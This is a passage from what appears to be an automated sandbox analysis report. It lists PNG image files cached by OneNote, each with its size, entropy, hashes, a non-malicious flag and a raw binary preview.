                                                                                                                                                    SHA-512:47F45A3275B8454F8000F4567153DD7D4AF3012005D8E34CB18AED6AD69083BEC753E607F275FBF3EFCCB7BA00310A04ADFBD5FA5B73E6BBE47CE73901C35CA8
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..x.U..I...JB..;H..."..(U.EE\\..._v]W..b...Az..{G:J..B.$...H.IHB.o2xE..3gf..w..2....w..s|.....C.$@.$.....t.!........8......RR....<...6..P||....$@.$@...PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.z*.#........1@.$@.b.PO.p... ....2.H..H@......B.$@..S.......!@=..VH..H.z.. .. .1...b8......PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.'++kH.G.=Z!.U...73o^.IH..O|jrj.D.......I.M.........Kph.............R.x.......RU8_".......j.......B"O.z.|.9.."..L....Y.d.Rej.-Y.dhX....:.xH.z.!(>&..4.....O.<..T\.%a..e...*..UnR....+j...2.."..M.O>.z......T...].j....m...S.`..&..)....f..2..............+..SP..?.a...=.....3......K.zj.5.fP.......2:..?.....%....d.qxC..W.~.._....!.W..6....iJ)*.(..wg.}.]sw\.r]...r"...e_-....5_9.YN'...PO-.d.:.%..wZQ...H...JMJ.6c....|g*..,.3.....T...o..Nyc.W.....A.3.._...U%...PG.z.....&.%.v....AIm.....~.

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004G.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):22634
                                                                                                                                                    Entropy (8bit):7.974332204835705
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:5ojjyi45m1/9gyhgFsH1ud103Pl39o0qjfsH37mNHy7QPaNbZy0:+r45m1/BWKy10tN22rmNHycobE0
                                                                                                                                                    MD5:548D234C9AB4021CA5FAB7BF22502465
                                                                                                                                                    SHA1:2F7495D250DC86EA99473CC342D164B859926021
                                                                                                                                                    SHA-256:7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
                                                                                                                                                    SHA-512:261523F5EAE6FCE2829B53AAC5938B1A0021C119E00CE82EFFDBD690FE71064E0F3B313ED1AB2F67A16C488AD5B1A91F5AF98029D88A7896F271C108410D42C5
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.............._......sRGB.........gAMA......a.....pHYs..........o.d..W.IDATx^..i.=YY6z@..DP.i.IAA........l.Dd0"p0.ON.~....s>.?zbH8..%$`....b7..=....25*.".L. ..u_..f...j.........Uk..^UW]...u..}.{.]t.-.(...J......e...t.....@i.k......_.(.....@...Z.6J......2.O.-P....._.u.=T..4p...e..q..5^f~....@i`....?.....@i..k.........?...u..O|bN.~?MbT%...@.LO.Or.`....$..y.{..o....~..(.;......SNi...6....w....~.{..^w......~.S...g?../|.O........7_...Oj....|......40......9....?..<.3nw...x...g...7.....(<.d...(3.K...;....\..:...'.5.....&...>...t.;....8..SO;../...._.}.{..D.jt.......jc...s..........Z...0q...@......Z]S.(..o.....Og.u.l.i.-.9..)j..~...5.l}..........G......k....Z..c.....}.c.?.\....t+u...15p.....[|......2..;..;...........w...........v.7...I.-w...K/.J...[..N.....W..U#...._.j(...//z.|..kv....];j|../m....t.9.;-0.:.4p..@K.....~.9.$qu.E....!.9|.m.+`).|......x..vak-].../.....G'....4.>B6$.......-o.q..L;*.N+....>...=.!.Y..Q...?......7..,....}

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004H.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):13737
                                                                                                                                                    Entropy (8bit):7.916899917415529
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:jgxmx2Fa/+76A6M6Y7rSYRv47cwbkkapeIiRmDGd+gUwOSpQ:KgyoWrJWRkkRXmad+gE8Q
                                                                                                                                                    MD5:830632032C7DDBCCDE126F4BAE935540
                                                                                                                                                    SHA1:9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF
                                                                                                                                                    SHA-256:2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
                                                                                                                                                    SHA-512:5C17EF9A0063499F2C34FAB2C4D968D29E20F20868921FA914E5737995AA0C166F224995109FF7ACA57B5B0F8647715DC670C4AEE385F61B5F8E6E8422C49EA8
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.............w.pl....sRGB.........gAMA......a.....pHYs..........o.d..5>IDATx^....E...,"o.....&....AY$....AE..".l....+G.>AP@D..e..".".A.Y.@...K..IXB !..!..c1.On...===3=.3=.>9O..u....w.z..-].t9]B@...!.......Z...B@...^G`.Q.&S..u$d....B.Y..P.w5[]......B.m.D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@..L..B@..........D..! .D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@......5jT.@.{..O.;k....>.._o.+......{V...&C..(?.m.....F....gd.....?.....3u..x^L.1n^...@../.....XE....L..!...t.....L..B.).=..sn..U........@.O..$..o..L.....g.(D...(....Lo8.....,....f;o..i.f.h.9........\./..[W.9.....+....,X..+.d.....Xc..7.p.m.Yg.u:YO.V..l.t.].Z.g.U...]...5.^..._.~.WL...o.3f..s.,Y.X.7.x5...K/-..._.......{........W.(Y....?...!....W;.....iwNMW.............@+Q.5.#.

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004I.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):13241
                                                                                                                                                    Entropy (8bit):7.931391290415517
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:a99pmP85w/MAMszG+iHGgrw8Ld+9aEsjQR:mgP85AMs6+UtrX+9mjQR
                                                                                                                                                    MD5:01367FEEE0A83E8765E971E0D3740900
                                                                                                                                                    SHA1:CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1
                                                                                                                                                    SHA-256:18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
                                                                                                                                                    SHA-512:8CFBDC014C42AE6417038B80424D2E9FBDDD7DFDDF579E349C3C17C9B52AF33A72463154D29539457C4ADAB2DB00CC28A67902FA8D9209E4AF00EDD46D52E5CA
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d..3NIDATx^...U...Y.]:.T...G.5..lX...B..Xb4F,I0X.....F...("vET4H......*EX........wo9..9.|...rw..;...;o......z.....B.......v.mn..>......E."....U...4s! ..F...u?.@...! .~F@... ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A.......~.*.U{.].....S.e...K.A.......7^?....D...h;...!.Eu...o.^..B@..# J...B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k..R].R...! .D...B@..........:..B@..R........! Ju.Ju$......j...! .\C@.....H...! J....B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k.D.RK.K.m.V.......(.^^^ZV^Z.7.a..........T..xsqYi....L......z....}....?..yyy.M\.b..U3W.0{...~.`}..M%.J*.w.mdv.&*..@....R..o/.^..5...x.g.>..ag....GM|t....\<s..y+6.X.? ,.R...-.W.m\..o..0g..i...h..W.Z.i...2.....o.&..@...-.B|.K..^.....u.}.M..6...,(...e.V.X........nkE....5.8....-.!.TtRxs....Q..2}.-..`....mX6i.w...

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004J.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):4490
                                                                                                                                                    Entropy (8bit):7.928016176674318
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:WXKr7Xwf6Obg+XaGOnsjbbGSb+ydWtRvEOhDE6XqPeosv02tR45boo:3rTUgXZnsHKSb+n+8DdKlwm
                                                                                                                                                    MD5:7F161B19B937AB48D4FD2F6E5E16FDBD
                                                                                                                                                    SHA1:BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9
                                                                                                                                                    SHA-256:C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
                                                                                                                                                    SHA-512:E915B76FAAC9512D2AD11CF4E4530A19BEA1C7D8508BC218C69CB041F1EEABA3E2E03B1D56E61B032A6418829752C21B8354AF1335466D7E1528A06E6742A461
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR...T...O.....;.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..p.U..'...rD.WX.... Q.. ....."$.ZHP.Z...C...........R..%G8R..... .R.C6..A.b...0...^...#..g..........z2.....nB...l..X.&._.a,...a,...a,...a,...a,._.73'N..ukeee.6mZ.n.m.G.}...n...a.9s.DGG....y...8??.o.pE1....Y.,......).ca.i.M.:5$$.........Lr...ye........6...8...z.-r....d.(.xc..U..^11...._>.QX..y..2...T...sss1..."A.?_.;w..S.F>......4.G.......D.|...@.K...............C...k...P...q....6.`QQEE................7;;;.._\q.k.|...\.z..6j>..n....Y.&G*.n.S$))).....r........}.{[Dv:,..w..A...`..........a.~.N.f.s...P...*..'7n....eK....+.n;:.W..C..9}..O..D.q..X..5i.s~en.c..F&..?.....l.]3r...W`..#..7o..R.@^..*...W..?}t...{.B.8..D...UPa..~..C...|.C].a.9..R...c.Y0..9.u...d...C.......X.U....WK.....5...'..PM.`...<. ._.z.F^^.EH.K>_.0.d..S...Yj<..~.5.?l.fZ0.@d.....*..G...K.....e...b.|e..Q.4.....('z...!G.....2..XQx\......X...2.\h..X~.e....Z....=....C.1.......w.....d.z.

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004K.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):17289
                                                                                                                                                    Entropy (8bit):7.962998633267186
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:ruwwXKZuqnOnZprU3+OXBruY4UkcY+TpI/BSqCrEoMXMEr3KbzHIDqqAmk+xob:tGcxE4PBruV3Uy5SqCAoMXzrQHoqAk+m
                                                                                                                                                    MD5:708E8EB906BC105CCA0535AE669AA651
                                                                                                                                                    SHA1:38D82DEDFE97D3001188C2E18FE13BD741FD520F
                                                                                                                                                    SHA-256:1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
                                                                                                                                                    SHA-512:1EFC74C28190DEE2D2732390B74049A1B120F05EFB8DC6925207C6990AD20450FFAB40249899A9DBB82E8F92A61F770E120A450CAAC7F8C5F0742586CCE0EDB6
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..C.IDATx^...Uc.._"oB.Hr.m(.0......r..[1.D....R..q)%FBDiB.."w*.k.Jz.Y..l....>...9{.......g..Y.z~..k?.z.^k..+V...! ....(.....\sM.tD@...!P...HW.S....u^.....@.r.^.....B@...U.H.J....... }....".....>....! ..A@.4..EE...! }*...B@....i<8.....B@.T2 .........xp..! .....d@...!......(*B@....S....B ...O..QT........! ..@<.H......! ..O%.B@...x..9...C'|..{.>Z../~^.s<<V4..ujo..v.Z7..EwT.....@.....?.......~{...K.........C........bB@.$.....C.{....Kf'S.....T.*&....@<.....'..D`...;~v.DT]...r!..>....ru...}.....#uG.T.....>..z ...3v....P.M.....5.@<...?....F.}..c.W[.._!P...O..>.M.d<..J....E .}ZZ.+.5v.p>..N.{B....>M.Nzfb...OB@.." }.D.y...IdK<..! }.:.....f.K..bX.T9...&T.&?.VB9.[B@..@@.4..1}.4.@H..-!..}..~M.<.z..I}.G....>..S...N..@yj..n..s.d._.....(..R"....Wf\.oO.^...\h.\.`)...ni.'.].vk.1-.k.^....#.,}.{.RM...~Z.S.. .@U!.&}......h...{K..@.........W.8.N.s.Y.0)..f+...%4.......5.@j.):k.+3...I..(

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004L.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):2332
                                                                                                                                                    Entropy (8bit):7.8822150338370776
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:jB5Gg4vMs30WIn5IVeRy1bY7DqbqQBAeNjukXlN4AXat:PGYuEWV/YH7e1uA0AXat
                                                                                                                                                    MD5:91CB7F1273AA003076401081B8A22237
                                                                                                                                                    SHA1:5157144069E7D2FDAE60B397BE5851E75BDF7707
                                                                                                                                                    SHA-256:80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
                                                                                                                                                    SHA-512:5A8E3C0ED0DB94BFE359C63793F12F3D7B3C37F3A13A5C96634BA1DC8C9E50FB1142FE4752FD9FBFA39A682F78C54AF868AD337EAA787801FE5F66D8F55A8196
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......L.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.\.LUe......Ji("....9....-.."..5L.Y.Y.....$350.."2.lK3Cg...T..DWZ.......i.?!<..~x..z.......w.sw......9....s...w..l6.:....p"dH...F..B<...qE,R$G\!..E..".).#...."..{f.PyI.d..l;....;.=.S...O.S[.\Y^P.aj]9*Y!. ..~..#...S.s...l..h.[m....%...P..@.kG......G..X.r|%..AO.}-..G>35..c....Ac.&[W.d..+...zG........=..l...VS.d..+...tGd..k-._.....oL.:}.p.~.W$C..|...I...n...~......,.i......e..=..?{......>r~.Lw.+2..\w.)w~...c....h..u..%...PE...f..'..m.ZE.1.\....U.`X......$...P%..UH{[K..o7~.k.49..W.t.~.^_..7.,....f."q....+....;...~;.c.......Xb.\?...........0h.lV..WX!.....ljm.1c..U...[..X.)......B=.0~..W...rO..j...ehI5U:..66V5sJ.....V...]Y>...1kQH..2.........d....S....I...+..].p.....m7...Z....s.D>.K/]..?.l....2..=..~.mq..".+.....,..8. v.o.).Z......>..Xv..i...TA....M.....>[X...Y.7lJ..e7..S.....02q.O&9.......:L....N.......W....d..FqE..T..N.....R....kXv[..j......g.K.\@`.M..B}8n

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004M.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):16003
                                                                                                                                                    Entropy (8bit):7.959532793770661
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:1l+zN+iNurNE/tBdEC/vkape2XHYdhOm+Bl6C4:L+zN+iNurGNEC3fpe2X8Pa+
                                                                                                                                                    MD5:3A5CD52E925A7C4A345047D8F06C3C41
                                                                                                                                                    SHA1:9C02828D83206BBD3EB58930C8C65A6CA5DBCF40
                                                                                                                                                    SHA-256:477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
                                                                                                                                                    SHA-512:8D8B6AC645ECC7C8BD374E6190819006C71AC0B5993419C42463009116214E5EC4B4235D94B4AE4CDA132E7DDA9807ADC51525824AC5F12696517FFC8890891E
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..>.IDATx^..|.....+)..H..C.K... ....x).rU..T..*E...;....*.@Z.....@...9q.g7[fgggg.............1//.."@....0..#.t..f.C..."@.....@OIR.#P...0..$...y.Pl"@....( @zJ]...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....p.T... ........ ... =..#.B.... =.>@........4.)."@....).."@...4.HO..H..."@.HO...."@..!@z*.GJ...."@zJ}...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....y.?.`.T... .f.P...$47........~E....!.D..X............].`....0..N.a...>[||...t.T.w *.. .....)'...=X?c.......+OE....<-84...=.....w.8...7.Ro&.D@!...GS.....s.......:...Gg..8..T...u...~..............<...S...../Y.......W........#. .vB...u.. .+.999YYY......wf..._.{6....=..]>Y?..;=02eb......2...;.%..\...P..R5....XMO.....6....W]...3g.5;.n{t.......F7S....r...[n.......AAX..j[.j.;.neef).2.....{ ..r..{7.-........i..S........<..pm.u.V....M.333....K..Mr.s..Ek..=t_.#.P...

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004N.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1924
                                                                                                                                                    Entropy (8bit):7.836744258175623
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:rloPN36BoJ9JK5lncTww67QKf5wX5YgM5s6cahePwnR6+eA9zQU13ALcVz7wTQ8U:rYN31JH6lcbjMW5Ytmyqwp9H7wY
                                                                                                                                                    MD5:B1FDE66F75507567B5F0C6C07B01A3A1
                                                                                                                                                    SHA1:80B8E6A923E853232F66C874367E90B5C9CAD7AE
                                                                                                                                                    SHA-256:B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
                                                                                                                                                    SHA-512:FC8C6038D3C2F5765D7524E969574ACD10AF6FCCFD45FE7C6DD4A8C2669B13EE3FB1A8833E94A046AB7037018170B5B87B1A2742E0E10557C413AD634BDF343E
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......U.....Q.6.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].O.W....G.lT^M*..J.....".4*....j..H..R^.".m..5....&..j..B..`.`..>...X......]z.[&.>..ef..gB.d...s~.=...3....m..(E...~.[....... .. .E3..7.4.......}..H._.D.,j.)..q\.....7..#.ag.o|.?.......;C|.#.../v.H.......o~.{G......H.|..;..v...G.._...p1d2..&......QS4<..i.".X.....1(..GR.R#.}.!.E<..:LLM......s..:"......Fa...b.....\.T..~OD... ..:j.~..p=Y...Y......?.Y.A...0!6_p.dKctjvZ....\.........V..1)..:.....;7:...(.[...7.....u..'ra.....S.]..........7.#,[..<.l.....[.........90d[.2a.R.........E.CJ..C..S..*._...$^...Q..:>hx.k7.`jN:.W.X..N..p..K..."...q....a.Uy.......[d.:vmkk./cW.>.K..C..?\d...'.@s_.?&.....V .?F..;k.....%+....+.3bk......f....T....S.(2.=...?gQ...K.._,.#....?.1W.......m2.....Z...-..:..?.#J......KS.P|&[<..........Dd.....\.....W$z].k..-..8...>..Q`Yz.}w&..._......?.)_[T...:wy...O8.Om......l.....\....]..."f...........q.o.V>~s...-....N{.n....w..O|.D...

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004O.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):4190
                                                                                                                                                    Entropy (8bit):7.94161730428269
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:GHfueo3dRLZKOSYDzGsEgfB9nqS0WKt/z2jOrrz7yrT7N:8A6AzZfBtqS0WKNC2vyx
                                                                                                                                                    MD5:8B3AEC1986A522951942BA72B85CCAA0
                                                                                                                                                    SHA1:7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14
                                                                                                                                                    SHA-256:8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
                                                                                                                                                    SHA-512:8EE1A1F6F0023EB4F60760C2E23EAFD56E6D298CAB49D819CF1D62C0CCF608D4211D3767856255F7CF8FF45AD835FE5475EB92C608989C522CD48D00A050B189
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......Y.....?.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]ip...fu.VBBZ..V'.>........CR......?r...pU\....v*...T~.U)0..('`....."..,a..Y..$t!...D...Mkvf4.VhW;S........{...zZw...i......fj..$..7......[Z*.[.[..Zk...?.t:M..,..`.^...X,..sUK[..Rg.=$..!.3<....74...iY..i...k.,.fA..Z.n...`G.%..H.l7..7J...u.R..6....E..!....N@.....M....Q`...U2.w.WP[!fX......c ./@7Mz....^...k.)....v.Q`..z..1A..P.{...||...vY.....>.`...K...m.?CX./v.8.....]..;...6..kw......N....z.Q...f..q..xk.5....;.?.Z.c...`......4....?.....VV.u~..<_......sU4e.....g.c.G....O/..r...`.G)....#d5.O..w..{....twL1l.)#&hF..K...M[@.Dl..V2..j.3..s....3M.....v..!....V..c..B...|..e.1....7.WA0.[.\.u.).$7f.+.......8..e2K/.%.Ii..`w6w.E..[?_.?.?..I.k2.s....]..f....HM.?w..d.9..Rr....Y.c.}.s.zk..rc...a..I(9~........m...Z............I........7.K:.:Bf.......m..1.......&..,...?a...c.@.@.g%...s.#...;..c6...g.lZ....}.WX.3.8.....W....N.w...L...}....?.".......;cI.............pS

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004P.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):4181
                                                                                                                                                    Entropy (8bit):7.943341403425058
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:b6JWqvCl45Da8kuGzhRwZvwIutfij19MQ8EpW14LBGJVCq:b6JTCl45DalsBws1R8914V5q
                                                                                                                                                    MD5:817D5A35EDB2B0E052194D4F49FDA19C
                                                                                                                                                    SHA1:FA6CB2016C5F43B76102B63D60359139227E07EA
                                                                                                                                                    SHA-256:0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
                                                                                                                                                    SHA-512:E0686BDBFC589401F0EAAE2B1598199EFA285F8392742B1C928B9274088804B23DCB584B6FEF68CE6D7E54DFF9C10338104F4C0F3F80A04471F0B2E8F9935CC0
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......\......!2a....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]iPTW..iv..D.....%DQ#A$...d..h,.T~..+...TM\cj*.)k.fj~L~$...L&...,...:.FdU..f_......._.n.m.....q.s.9.=..w.9......$..b.*..%....@A]A..%..<......l.h.+../..OSe.....]...>..C........^cCy.0nz.4<......g..?~..>.1ws.B....07W65.74T....=..v.......D....6.....tR....}]}....4z..^....7..;.."......^.....|=.#.=.32..o.<.Tn*Q....g.zN...n*...!/.........!....F..]...6...m...CX..~...+..U...E.|.........7]=rE?i(..$`e.%.`.....w._.Y...l.1...@....t.P..=.}..*...N...N.|.xS.5&.....Pe......Z.Z^XJkx.....^.....?7..._....Wsz......}G..]...\.....,[.y....}.J....'.R?a...G5..l.i.?....MH..l.DC^._.c.m.....%{;z.&.*+x;...S.....zxyH..`.._]...el^........U.T..^..p..z[.6(2x..,#;o##..}Zv|Z..............V.....0}Z....]..m.....x..).k]&e.._.W!Vry..%...I..d..}w.....^..\............m[.^.3r.......-8......j....>...Q..T..{\V\ptH.?........1..w....FHl...x.....\.`.ei.w..)`...g..V{..Z.....8..........o.._..

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004Q.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):8184
                                                                                                                                                    Entropy (8bit):7.807848176906598
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:192:ExqMHYnnEnntvA4Mesu3SXHycmfIEFQp1r/:E0MGEn29esuiXHt0FQp1
                                                                                                                                                    MD5:5B386BF9A20766956A84F67F913F23D7
                                                                                                                                                    SHA1:6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7
                                                                                                                                                    SHA-256:DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
                                                                                                                                                    SHA-512:99B4109439D9A688D7747C6847E0FF7399CDA01A89C3181789F913E757A82EE4727F95E506F4B01930EFC7C6E229B94BB89E385B56BC009AB5CFE332585660C5
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...]...!.......!.YTP.A......-..r..$.E.J.I;....T.M.UE[..Q..x....wKB=.m...4.%..|:...9...\{..o.3..g.o~..~s...k...X.r....... ..@Gggg.?.... P_.]]]..*Iu....C...h..$...:... ..... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A..............W_...1c.l..6..`...@ ..I.S..I.I'...5.\..;....'1. ...........c..k.u.Qs..}..g#b.j.@..Y..QR...n.!...-......h..Z.......Xw.U.~q... ..@.%.'............. P..E.T.b.:j.(F..p.... .C.}3.'.|..z..w.a.....\{.:.4[.lY..~...x..'/....g....J..9.K_...'...:..;)......SO=u..E... Py.qf..}O7.o....u?:....6~~..9...?7.

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004R.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):4181
                                                                                                                                                    Entropy (8bit):7.950380155401321
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:L6ousL3eslFAmjb89xK6YiSTwtw5dTA1W9lQ:GoFiUFAMbsxJYieZ5dGklQ
                                                                                                                                                    MD5:BC6C08F8C2C6D1EEE95ABFC40C3C3669
                                                                                                                                                    SHA1:44DE7375375880ACC24938D7E92A837E85C35321
                                                                                                                                                    SHA-256:6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
                                                                                                                                                    SHA-512:2AF4A9B87FA4F362926CD77F272CECBE3ED4F0E110FB8F30F661DF7C61B77B9FD8E7716EEF9177B1038B68C792CA4F844F729DAA48B2E38B9945EC9CB44BB720
                                                                                                                                                    Malicious:false
